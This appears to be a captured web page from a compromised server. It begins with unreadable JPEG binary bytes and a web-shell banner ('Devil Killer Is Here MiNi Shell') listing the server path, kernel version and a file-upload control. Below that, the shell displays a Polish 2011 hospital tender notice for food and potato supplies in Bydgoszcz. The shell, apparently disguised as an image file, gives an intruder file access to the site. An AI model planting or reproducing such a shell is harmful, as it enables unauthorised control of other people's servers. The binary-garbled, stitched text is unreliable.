JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110114/18149-N-2011.html

<p class="kh_header"><b>Bydgoszcz: Dostawa artykułów spożywczych oraz ziemniaków jadalnych</b><br>
<b>Numer ogłoszenia: 18149 - 2011; data zamieszczenia: 14.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Uniwersytecki Nr 2 im. dr Jana Biziela w Bydgoszczy , ul. Ujejskiego 75, 85-168 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3655352, 3655521, 3655296, faks 052 3655752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biziel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych oraz ziemniaków jadalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z rozładunkiem produktów spożywczych oraz ziemniaków jadalnych w zakresie następujących grup:
Grupa 1 :  Artykuły sypkie :
1.	Cukier ( od 1kg do 50 kg ) - 3 500 kg.
2.	Mąka pszenna typ 550 ( od 1 kg  do 50 kg )  - 3 000 kg.
3.	Płatki owsiane górskie ( od 0.5 kg  do 5 kg ) - 400 kg.
4.	Ryż ( od 1 kg do 50 kg ) - 2 600 kg.
5.	Kasza jęczmienna ( od 1 kg do 25 kg ) - 600 kg.
6.	Mąka ziemniaczana ( od 0,5 kg  do 1 kg ) - 200 kg.
7.	Sól ( od 1kg do 50 kg ) - 2 000 kg.                
8.	Kaszka manna ( od 1 kg  do 25 kg ) - 600 kg.
Grupa 2 : Makarony :
1.	Makaron jajeczny kolanka / świderki ( od 1 kg do 5 kg ) - 2 000 kg.
2.	Makaron jajeczny / gruba nitka ( od 1 kg do 5 kg ) - 500 kg.
Grupa 3 : Desery :
1.	Kisiel - różne smaki - ( Cykoria ) - ( paczkowany do 1 kg ) - 200 kg.
2.	Budyń - różne smaki - ( Cykoria )  - ( paczkowany do 1 kg ) - 120 kg.
3.	Galaretka owocowa - różne smaki - ( Cykoria ) - ( paczkowana do 1 kg ) - 150 kg.
4.	Żelatyna bez przypraw - ( Cykoria ) - ( paczkowana do 1 kg )-  30 kg.
Grupa 4 : Kawa, herbata i podobne produkty :
1.	Herbata czarna granulowana ( 1 kg ) - 360 kg.
2.	Herbata owocowa ekspresowa ( paczkowana - od 20 g do 1 kg ) - 20 kg.
3.	Herbata miętowa ekspresowa ( paczkowana - od 20 g do 1 kg ) - 20 kg.
4.	Kawa zbożowa  ( od 0.5 kg do 1 kg ) - 900 kg.
5.	Kakao - ( Deco Moreno ) - ( 200 g ) - 90 kg.
Grupa 5 :  Zupy instant :
1.	Zupa żurek - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
2.	Zupa pieczarkowa - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
3.	Zupa szparagowa - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
4.	Sos sałatkowy - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 50 kg.
Grupa 6 :  Przetwory owocowe :
1.	Miód pszczeli naturalny ( od 200 g do 400 g )  - 100 kg.
2.	Miód pszczeli naturalny porcjowany (od 25 g do 30 g ) - 280 kg.
3.	Dżem truskawkowy ( od 280 g do 350 g ) - 150 kg.
4.	Dżem wiśniowy ( od 280 g do 350 g ) - 150 kg.
5.	Dżem porcjowany - różne smaki ( od 25 g do 30 g ) - 280 kg.
6.	Powidła śliwkowe ( od 280 g do 400 g ) - 150 kg.
Grupa 7 : Przetwory owocowe :
1.	Mus jabłkowy ( od 700 g do 1 000 g ) - 880 kg.
Grupa 8 : Przetwory warzywne :
1.	Koncentrat pomidorowy 30 % - ( Włocławek ) - ( od 900 g do 1 000 g ) - 200 kg.
2.	Koncentrat pomidorowy 30 % - ( Włocławek ) -  ( od 1 000 g do 3 000 g ) - 200 kg.
3.	Sok pomidorowy łagodny bez cukru ( 1 litr ) - 2 000 litrów.
4.	Sok pomidorowy bez cukru - ( 250 - 330 ml - butelka ) - 200 litrów.
5.	Sok Warzywno-owocowy  zagęszczony - ( 200 - 330 ml ) - butelka lub kartonik   - 1000 litrów.  
Grupa 9 : Przetwory warzywne :
1.	Szczaw  konserwowy ( od 300 do 400 g ) - 400 kg.
2.	Koncentrat barszczu czerwonego ( do 1 litra ) - 50 litrów.
3.	Przecier ogórkowy ( od 300 g do 400 g ) - 200 kg.
4.	Kukurydza konserwowa ( od 300 g do 400 g ) - 100 kg.
5.	Musztarda stołowa ( od 1 kg do kg ) - 50 kg.
6.	Ketchup - 100 kg   ( od 1 kg do 3 kg ). 
7.	Majonez - 100 kg ( od 1 kg do 3 kg ).
8.	Ogórek konserwowy -300 kg ( od 1 kg do 3 kg ).
9.	Papryka konserwowa - 300 kg ( od 720 g do 3 000 g ).
Grupa 10 : Przyprawy :
1.	 Przyprawa w płynie do zup, sosów, typu magi - ( Winiary) -  ( 1 000 ml ) - 320 litrów.
2.	 Pieprz czarny, naturalny mielony ( do 1 000 g ) - 30 kg.
3.	 Pieprz ziołowy ( do 1 000 g ) - 30 kg.
4.	 Papryka czerwona, słodka, mielona ( do 1 000 g ) - 30 kg.
5.	 Majeranek otarty ( do 100 g ) - 10 kg.
6.	 Ziele angielskie ( do 100 g ) - 4 kg.
7.	 Liść laurowy ( do 100 g ) - 4 kg.
8.	 Przyprawa do potraw typu Wegeta ( Winiary)  - ( od 1 do 5 kg ) - 110 kg.
9.	 Ocet spirytusowy 10 %  ( 0,5 litra ) - 200 litrów.
10.	 Oregano ( do 100 g ) - 1 kg.
11.	 Czosnek granulowany ( do 100 g ) - 5 kg.
12.	 Kwas cytrynowy ( od 50 g do 100 g ) - 30 kg.  
Grupa 11 : Soki :
1.	Sok jabłkowy 100 %, bez cukru ( od 1litra do 2 litrów ) - 600 litrów.
2.	Sok pomarańczowy 100 %, bez cukru ( od 1 litra do 2 litrów ) - 600 litrów.
3.	Sok czarna porzeczka 100%, bez cukru ( od 1 litra do 2 litrów ) - 600 litrów.
4.	Sok 100%, różne smaki, bez cukru ( kartonik  200 ml ze słomką ) - 1 000 litrów.
5.	Syrop owocowy malina ( wiśnia ) -  ( od 2 litrów do 7 litrów ) - 500 litrów. 
Grupa 12:  Ciastka :
1.	 Herbatniki bez czekolady ( od 50 g do 100 g ) - 50 kg.
2.	 Wafle bez czekolady ( od 30 g do 50 g ) - 50 kg. 
3.	 Chrupki kukurydziane naturalne ( paczkowane - od 60 do100 g ) - 150 kg. 
4.	 Krakersy naturalne  ( paczkowane -180 g ) - 110 kg.  
5.	 Suchary bez cukru  ( Mamut ) - ( paczkowane - 280 g ) - 600 kg.
Grupa 13 : Ciastka:
1.  Wafle ryżowe naturalne ( paczkowane od 100 do 300 g ) - 100 kg. 
2.  Listki waflowe bez cukru ( 32 g ) - 50 kg.  
Grupa 14 : Tłuszcze roślinne :
1.	  Masło roślinne bezmleczne do smarowania, zawartość tłuszczu roślinnego 80 % ( od 250 g do 500 g ) - 1 200 kg.
2.	  Margaryna zwykła kostka ( od 250 g do 500 g ) - 1 600 kg.
3.	  Olej rzepakowy uniwersalny ( 1 litrowy ) - 1 000 litrów.
4.	  Olej rzepakowy uniwersalny ( od 3 litrów do 5 litrów ) - 1 500 litrów.
Grupa 15 : Mleko :
1.  Mleko w proszku, pełne ( 500 g ) - 50 kg.
Grupa 16 : Jaja :
1.  Jaja kurze klasa M ( od 53 g do 63 g, średnie ) - 100 000 szt. 
Grupa 17: Ziemniaki :
1.  Ziemniaki jadalne - ( od 20 kg do 50 kg ) - 70 000 kg - ( wartość obejmuje dostawę ziemniaków młodych od 01.07 ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.61.21.00-2, 15.61.33.80-5, 15.61.23.00-4, 15.87.24.00-5, 03.21.13.00-6, 15.85.11.00-9, 15.86.00.00-4, 15.89.14.00-4, 15.87.12.60-4, 03.14.21.00-9, 15.33.22.90-3, 15.33.21.40-7, 15.33.11.34-5, 15.33.14.00-1, 15.87.12.50-1, 15.87.00.00-7, 15.87.21.00-2, 15.87.10.00-4, 15.32.17.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca  przedstawi oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca  przedstawi oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca  przedstawi oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca  przedstawi oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony jeżeli Wykonawca  przedstawi oświadczenie zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego do oferty należy załączyć: 
1.   oświadczenie o wdrażaniu lub stosowaniu zasad systemu HACCP - dotyczy grup: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
2.   oświadczenie, że wykonawca jest pod nadzorem Regionalnej Stacji Sanitarno - Epidemiologicznej                w przypadku hurtowni i dystrybutorów - dotyczy grup: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,    
3.   oświadczenie, że wykonawca jest pod nadzorem weterynaryjnym w przypadku mleczarni - dotyczy grup: 14 ( poz. 1, 2 ), 15, 
4.   oświadczenie, że wykonawca jest pod nadzorem weterynaryjnym wraz z podaniem weterynaryjnego numeru identyfikacyjnego fermy - w przypadku fermy - dotyczy grupy 16   
5.   aktualny dokument potwierdzający pozytywny wynik badań zdrowotności stada - dotyczy  grupy 16
6. aktualny dokument zawierający numer rejestracji producenta ziemniaków wystawiony                       przez Wojewódzki Inspektorat Ochrony Roślin - dotyczy grupy 17
   7. aktualną decyzję,/zezwolenie/postanowienie/zaświadczenie Regionalnej Stacji Sanitarno - Epidemiologicznej dopuszczającą pojazdy do transportu przedmiotu zamówienia -  dotyczy grup: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o podwykonawcach 2. Pełnomocnictwo - w przypadku, gdy oferta będzie podpisywana przez osobę upoważnioną. 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy załączyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu               i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wykonawców wspólnie ubiegających się o zamówienie oświadczenie i dokument o których mowa w sekcji III. 4.2 składa każdy z wykonawców. Oświadczenie i dokumenty                    o którym mowa w sekcji III.4.1 i III.5 wykonawcy składają wspólnie. 4. Wykonawca może polegać na wiedzy                                    i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,                 w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( wówczas należy załączyć do oferty ). 5. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy określone w sekcji III.4.3.1 stosuje się odpowiednio</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany w umowie: 
1)	zmiany stawki VAT, w przypadku zmiany stawki VAT wprowadzonej właściwymi przepisami,
2)	przedłużenia czasu trwania umowy, nie dłużej niż o jedną czwartą okresu jej trwania określonego w umowie, w przypadku nie zrealizowania przedmiotu umowy w całości w okresie określonym w umowie.
3)	obniżenia cen przypadku zaistnienia okoliczności mających wpływ na (uzasadniających) obniżenie ceny, 
4)	nr rachunku bankowego, nazwy i innych danych Stron umowy, w przypadku  zmiany tych danych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bizie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Uniwersytecki nr 2 im. dr Jana Biziela w Bydgoszczy; ul. Ujejskiego 75, 85-168 Bydgoszcz, Dział Zamówień Publicznych i Zaopatrzenia, pokój 39. Cena SIWZ-10 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2011 godzina 10:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego przy ul. Ujejskiego 75 w Kancelarii Szpitala lok nr 46A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Numer sprawy: NZZ/03/D/11. Miejsce i termin otwarcia ofert: siedziba zamawiającego przy ul. Ujejskiego 75 - świetlica - niski parter w dniu 24.01.2011 r. o godzinie 12:00. Uprawnieni do kontaktów z wykonawcami: Piotr Jurak - Dział Zamówień Publicznych i Zaopatrzenia, tel. (052) 36-55-296, fax. (052) 36-55-496, lok. 39, w godz. 7: 30 -15:00 , Maria Szuda - Kuchnia Ogólna, tel (052) 36-55-482 , w godz. 7.00-15.00. Godziny urzędowania: od poniedziałku do piątku: 7:30-15:00 E-mail: przetargi@biziel.pl Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. NIP: 953 258 22 66. Regon: 340517145. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: Zamawiający uzna, że warunki są spełnione jeżeli Wykonawca przedstawi oświadczenie wymienione w SIWZ w Rozdziale III w pkt. 1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie Wykonawca spełnia / nie spełnia poszczególne warunki  w oparciu o informacje zawarte w oświadczeniu. Z treści oświadczenia musi jednoznacznie wynikać, iż wymagane warunki Wykonawca spełnił. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena spełnienia warunków udziału w postępowaniu zostanie dokonana łącznie. Udostępnienie oraz cena specyfikacji istotnych warunków zamówienia: 1. SIWZ jest dostępna w formie pisemnej i elektronicznej od dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, do dnia składania ofert. 2. Formę pisemną SIWZ po złożeniu pisemnego wniosku( osobiście lub faksem) można odebrać w siedzibie Zamawiającego, w Dziale Zamówień Publicznych i Zaopatrzenia, lok. nr 39, w godzinach 8.00 -14.30 od poniedziałku do piątku w dni robocze po okazaniu dowodu wpłaty dokonanej w kasie Szpitala (Kasa czynna od poniedziałku do piątku w dni robocze w godzinach: 8:00 - 10:30, 12:30-14:30). Zapłata w formie gotówki. SIWZ na żądanie może zostać przesłana pocztą lub firmą kurierską za pobraniem + koszty przesyłki które ponosi wykonawca. 3. SIWZ na wniosek zostanie przekazana w terminie do 5 dni licząc od dnia otrzymania wniosku. 4. Cena 1 egzemplarza kopii SIWZ wynosi 10 zł brutto, płatne gotówką lub za pobraniem. 5. SIWZ nieodpłatnie można pobrać w wersji elektronicznej zamieszczonej na stronie internetowej Zamawiającego www.biziel.pl. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1 :  Artykuły sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier ( od 1kg do 50 kg ) - 3 500 kg.
2.	Mąka pszenna typ 550 ( od 1 kg  do 50 kg )  - 3 000 kg.
3.	Płatki owsiane górskie ( od 0.5 kg  do 5 kg ) - 400 kg.
4.	Ryż ( od 1 kg do 50 kg ) - 2 600 kg.
5.	Kasza jęczmienna ( od 1 kg do 25 kg ) - 600 kg.
